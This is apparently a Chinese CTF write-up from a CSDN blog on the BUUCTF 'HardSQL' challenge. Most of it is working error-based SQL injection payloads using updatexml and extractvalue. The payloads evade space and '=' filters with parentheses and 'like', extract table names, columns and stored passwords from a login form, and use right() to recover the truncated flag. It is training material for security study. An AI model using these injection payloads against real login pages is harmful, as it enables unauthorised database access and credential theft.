-
web:[极客大挑战 2019]HardSQL
题目
打开页面显示为
查看源代码没有发现其他的提示信息,随便尝试一下
错误
题目名为hardsql,先来尝试有无sql注入存在
尝试输入单引号输入
显示页面存在注入
这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示
上述测试闭合时返回了错误信息,用bp抓包,看一下过滤的,发现用于报错的注入函数没有被过滤
使用updatexml
通过查询可知,updatexml在执行时,第二个参数应该为合法的xpath路径,否则会引发报错的同时将传入的参数进行输出
先查询数据库,构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123
可得知数据库名为geek
查询表,构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123
得到表
查字段,构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=123
可以得到字段名
然后查询想要的字段
构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=123发现flag显示不全,函数显示有字符数限制
使用right可得到另一半
构造payload
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123使用extractvalue()
这里空格和=没有,使用()代替空格,使用like代替=
查数据库
构造payload
- /check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23
查表
构造payload
- /check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23
查字段
构造payload
- /check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23
查数据
- /check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23
这里也是显示不全,按照上面的updatexml后的方法进行补全即可
参考文章链接:
buuctf-[极客大挑战 2019]HardSQL(小宇特详解)_小宇特详解的博客-CSDN博客
-
相关阅读:
kubernetes二进制方法部署v1.23版本k8s详细安装步骤
24岁晋升管理层:6条职场建议改变我的一生
自媒体创作审核不通过怎么办?教你一个小技巧,提高效率
buuctf web [极客大挑战 2019]Upload
gd32 USB HOST 接口
【考研复试】计算机专业考研复试英语常见问题三(个人选择/学业规划篇)
仿牛客网项目总结
【软考】UML中的图之对象图
Jenkins-Android源码编译【架构设计】(适用鸿蒙/自动化/多产品/持续迭代)
基于Linux安装和配置集成开发环境IntelliJ Idea
- 原文地址:https://blog.csdn.net/gsumall04/article/details/133833922